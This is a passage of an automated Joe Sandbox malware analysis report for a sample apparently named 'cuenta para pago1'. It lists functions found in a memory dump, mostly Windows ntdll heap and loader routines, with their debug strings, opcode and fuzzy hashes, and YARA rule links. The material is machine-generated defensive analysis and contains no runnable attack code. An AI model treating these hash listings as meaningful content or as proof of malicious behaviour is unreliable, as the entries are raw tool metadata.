                                                                                      • Opcode ID: 8197b6fe60644096a07f7f74bb146a32ff83dd982b40fd7e79bd25af7983c80f
                                                                                      • Instruction ID: 7716c36df4830555abf6a400a1db047fb0485210732ab163334b45a4668fc6bf
                                                                                      • Opcode Fuzzy Hash: 8197b6fe60644096a07f7f74bb146a32ff83dd982b40fd7e79bd25af7983c80f
                                                                                      • Instruction Fuzzy Hash: 3A31E37AB01224BFFB108A85EC46F5BBB6CDB41790F014299B900B7355D772EE00DBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348D0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-4253913091
                                                                                      • Opcode ID: 441c65234934e4a9bd11d37f36630d7366fdc80ee9fe6abe97167f1cb8803f28
                                                                                      • Instruction ID: f6ccad7071c1d5f1ff9b8e40359007fb07258586733d6a4ae41721d5ac1c2fe2
                                                                                      • Opcode Fuzzy Hash: 441c65234934e4a9bd11d37f36630d7366fdc80ee9fe6abe97167f1cb8803f28
                                                                                      • Instruction Fuzzy Hash: E3F1AC74B01709DFEB15CF68C884B6AB7B9FF86344F1082A9E5159B385DB34E981CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348E9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 3446177414-2283098728
                                                                                      • Opcode ID: 3ec164b236618db2d45e4971325265a7f707ea6241b4292d3ab00519c11a061e
                                                                                      • Instruction ID: a073637edb8aa1dc8e481e67197d318d2d499fc75b35a3e4415725fe2860518d
                                                                                      • Opcode Fuzzy Hash: 3ec164b236618db2d45e4971325265a7f707ea6241b4292d3ab00519c11a061e
                                                                                      • Instruction Fuzzy Hash: 3B51F175704701DFEB10DF38C884A3977A5BB86314F14076CE9A1976A1EBF0A886CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348FC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 349380F3
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 349380E9
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 349380E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-1783798831
                                                                                      • Opcode ID: 392c480eb0c49421a613b0be5e7465f98ab0fc20fa71684b0da92738398ffacb
                                                                                      • Instruction ID: 427775ccb8b6469fc533c866a9829f286d390eca55c9ab2bb3edeacbf0e219de
                                                                                      • Opcode Fuzzy Hash: 392c480eb0c49421a613b0be5e7465f98ab0fc20fa71684b0da92738398ffacb
                                                                                      • Instruction Fuzzy Hash: 5041D2B5519300EFEB10DB68DC44B5B7BE8FF45650F004A2EF858A7290EB74E901CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 349443D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 34944519
                                                                                      • LdrpCheckRedirection, xrefs: 3494450F
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 34944508
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 3446177414-3154609507
                                                                                      • Opcode ID: 576f8b80850061b784eb9d7605a515c027d4839f4badc48e8719582fbea3d69c
                                                                                      • Instruction ID: 3765a2641c2a9b8858489199e23ee2eb0c51958b302cbf9424b808c82da4aa23
                                                                                      • Opcode Fuzzy Hash: 576f8b80850061b784eb9d7605a515c027d4839f4badc48e8719582fbea3d69c
                                                                                      • Instruction Fuzzy Hash: B441AE76704711DFEB21CF68C840A567BE9EF887A8F06065DED98A7366D730E800CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348E510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • WindowsExcludedProcs, xrefs: 348E514A
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 348E519B
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 348E5167
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 348E5272
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 348E534B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      • Opcode ID: 96ac942530e08b79c803644208845b4f1c56911f0d040118e0c37308ed4f9faa
                                                                                      • Instruction ID: c37c2ee7b7ee6995015df8cebcede046226771c57f5af3084448f1ae86c809a0
                                                                                      • Opcode Fuzzy Hash: 96ac942530e08b79c803644208845b4f1c56911f0d040118e0c37308ed4f9faa
                                                                                      • Instruction Fuzzy Hash: 2FF13BB6D02219EFDB51DF98C980AEEBBFCEF09650F50416AE511A7211DB709E41CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3499ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: e33d9417294cef376fc01ab6abb2878823e3e0ae2e4497fdbbd32b9e7a140311
                                                                                      • Instruction ID: a1ef9e6fb23aab7da20ace23549247e8f92ec11f8b6d7eaf8ea6c4afa6283650
                                                                                      • Opcode Fuzzy Hash: e33d9417294cef376fc01ab6abb2878823e3e0ae2e4497fdbbd32b9e7a140311
                                                                                      • Instruction Fuzzy Hash: 29F12976F006519FDB18CFA8C9906BDFBFAEF88200B19416DD466DB384E634E941CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                      • API String ID: 0-3061284088
                                                                                      • Opcode ID: ab45f002e16b2f0331789fa12de9c435220649bac1adbcc8ecec337cfe7ef906
                                                                                      • Instruction ID: 1e5a6bb778ecd1d081b4c97f1478ddad54bf237c4ee9f107663d98dea9ceaf9e
                                                                                      • Opcode Fuzzy Hash: ab45f002e16b2f0331789fa12de9c435220649bac1adbcc8ecec337cfe7ef906
                                                                                      • Instruction Fuzzy Hash: BE01243A115A88FFF70A936C940AF937BE8DB42730F14418AE4404BF929AA59840DA64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 348C0586
                                                                                      • kLsE, xrefs: 348C05FE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                      • API String ID: 3446177414-2547482624
                                                                                      • Opcode ID: a77be76ab31f0baecaca38e7dc4e4c3fc62482cf3c61b76000c9e464e29c8496
                                                                                      • Instruction ID: 57d6119d31ea8b45331efbb8a41e59e9f6caef16db6a5dff9ea272cc891b2274
                                                                                      • Opcode Fuzzy Hash: a77be76ab31f0baecaca38e7dc4e4c3fc62482cf3c61b76000c9e464e29c8496
                                                                                      • Instruction Fuzzy Hash: 32519EB5A00749DFEB10DFE4C4406AAF7F8AF46384F00862ED595A3241E774D945CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348CA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                      • API String ID: 0-379654539
                                                                                      • Opcode ID: a2510d25c246a5e3817d4b943fa08b697eb22f38a32aa099d979c938c1e8cd1c
                                                                                      • Instruction ID: 78ea4c28123b1b01762404d16eaf0dc8b9698075d19642a9cfacc6c4b1a570a1
                                                                                      • Opcode Fuzzy Hash: a2510d25c246a5e3817d4b943fa08b697eb22f38a32aa099d979c938c1e8cd1c
                                                                                      • Instruction Fuzzy Hash: 8AC15A7520838ACFE711CF68C540B9AB7E8EF85744F008A6EF8959B650E774CD49CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 349320C0
                                                                                      • .Local, xrefs: 348F27F8
                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 34931FE3, 349320BB
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 34931FE8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                      • API String ID: 0-1239276146
                                                                                      • Opcode ID: abad3b166390e2bb0ab48b43fdc9233b99b7e7af8eeddd3c0b0e8bd13eb8e2d2
                                                                                      • Instruction ID: 71ce4651744ef527d89a852ea77e4b0c2c6fe2cdc2e95714eb8d2258f5c9f192
                                                                                      • Opcode Fuzzy Hash: abad3b166390e2bb0ab48b43fdc9233b99b7e7af8eeddd3c0b0e8bd13eb8e2d2
                                                                                      • Instruction Fuzzy Hash: F3A19C35A01329DFEB20CF64EC84B99B3B5BF59314F5002EAD818AB251D7729E85CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 34920E2F
                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 34920DEC
                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 34920EB5
                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 34920E72
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                      • API String ID: 0-1468400865
                                                                                      • Opcode ID: e8bb6ef5385fc37cf1e12cb4ee0391de46050d104225f1fac071fe4ef35a9204
                                                                                      • Instruction ID: 726e847cfb18fdb5c234bbcba27462662f8996ee0063946ce5241e1fe84409f0
                                                                                      • Opcode Fuzzy Hash: e8bb6ef5385fc37cf1e12cb4ee0391de46050d104225f1fac071fe4ef35a9204
                                                                                      • Instruction Fuzzy Hash: 7671AFB1908308DFEB50CF14C884F87BBA8AF857A4F4045A9F9489A257D734D989CFD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      • API String ID: 0-2586055223
                                                                                      • Opcode ID: faa3e5d7b1e9309c580e773a8affe9d3f8ef5252ea98b16e223c6f7e57e3f989
                                                                                      • Instruction ID: 9b180a2f6e27f89d6cdd9af18150c1a904aba748902b424e02365ea57260ad1e
                                                                                      • Opcode Fuzzy Hash: faa3e5d7b1e9309c580e773a8affe9d3f8ef5252ea98b16e223c6f7e57e3f989
                                                                                      • Instruction Fuzzy Hash: 1061F175205788AFFB11CBA8C854F57B7E8EF85790F040A59FAA4CB391D674E900CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      • API String ID: 0-1391187441
                                                                                      • Opcode ID: 30a5ea70b9bf00fc306b4f1a192a80adfd41f910392d62bd06207bb69b584e66
                                                                                      • Instruction ID: 62a90b45652881973f9e6c4053692c2eba379a3e7bf106bd4dc460cda511f938
                                                                                      • Opcode Fuzzy Hash: 30a5ea70b9bf00fc306b4f1a192a80adfd41f910392d62bd06207bb69b584e66
                                                                                      • Instruction Fuzzy Hash: 4A31E676A01208EFEF11CB98CC84F9BB7B9EF45760F114295E414AB391E774D941DE60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 76ce518fddd782fa006ec862b6df8373b34e6fbec04005286b6924f325b8ce0f
                                                                                      • Instruction ID: f870b5816b258b71ecf175fec24b48999598603d298230cf43524b3a58d35b3a
                                                                                      • Opcode Fuzzy Hash: 76ce518fddd782fa006ec862b6df8373b34e6fbec04005286b6924f325b8ce0f
                                                                                      • Instruction Fuzzy Hash: FE51E0B4A0460AEFEB05DFA8C845BADF7B9FF44365F10426AE41297290EB74DD11CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34953608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      • API String ID: 0-1168191160
                                                                                      • Opcode ID: 2cf45dcf27d667d828e4d06ac6ba7ced6c0614875f1bda3310cff5eb817c24ab
                                                                                      • Instruction ID: b1b2eb131883cbed1f0d6a1d0069fa3935bd39dd25531afe7acb7a6fc24d33c1
                                                                                      • Opcode Fuzzy Hash: 2cf45dcf27d667d828e4d06ac6ba7ced6c0614875f1bda3310cff5eb817c24ab
                                                                                      • Instruction Fuzzy Hash: 44F172B5A01228CFDB30CF14CC90799B3B9EF88754F6481E9D60997261E7319E85CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • HEAP: , xrefs: 348C14B6
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 348C1648
                                                                                      • HEAP[%wZ]: , xrefs: 348C1632
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      • API String ID: 0-3178619729
                                                                                      • Opcode ID: 420aca0b5f6d69425ce6ff2e9bf8f89891b6b91c6b3acb4c7ce33a9d235230d7
                                                                                      • Instruction ID: 0d104ce75ee3fc2bbd159804e92469d8f48ec5701f7d89e9400b4a618edcbc87
                                                                                      • Opcode Fuzzy Hash: 420aca0b5f6d69425ce6ff2e9bf8f89891b6b91c6b3acb4c7ce33a9d235230d7
                                                                                      • Instruction Fuzzy Hash: 23E1EF74A043499FEB19CF68C490BBAFBE6EF48300F148A5DE496CB246E734E941CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348EF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 349300C7
                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 349300F1
                                                                                      • RTL: Re-Waiting, xrefs: 34930128
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                      • API String ID: 0-2474120054
                                                                                      • Opcode ID: 1df40cc1c697dbdcf47a679528a457fc800742d24bfb3b2979ea388587737ed7
                                                                                      • Instruction ID: aac6aceff2ce421cd18eececde73740abeadcee6b7767db477d71592c2f87efb
                                                                                      • Opcode Fuzzy Hash: 1df40cc1c697dbdcf47a679528a457fc800742d24bfb3b2979ea388587737ed7
                                                                                      • Instruction Fuzzy Hash: 0FE1A074608741EFE711CF28C840B1AB7E5BB8A394F104B5DF6A58B2E1DB74D985CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348CB5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-1145731471
                                                                                      • Opcode ID: 762aef6b7cc6ff4ff03474b8b9e32ff3b3b184773a2d309b9ba12526a83df994
                                                                                      • Instruction ID: 14fe87a23f82779e4e281aaf1b7aaff26e035efea578b175d9357955652f48de
                                                                                      • Opcode Fuzzy Hash: 762aef6b7cc6ff4ff03474b8b9e32ff3b3b184773a2d309b9ba12526a83df994
                                                                                      • Instruction Fuzzy Hash: C2B1AD75A50B099FEB25CF68D891B9DB3B9AF48794F10862EE811EB784DB30DD40CB00
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348BA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 0-2779062949
                                                                                      • Opcode ID: 0dff8942b2b0f5728a95bbec8d8c3f64f19a4ecaac0e9c0858ee960cb65b5e2b
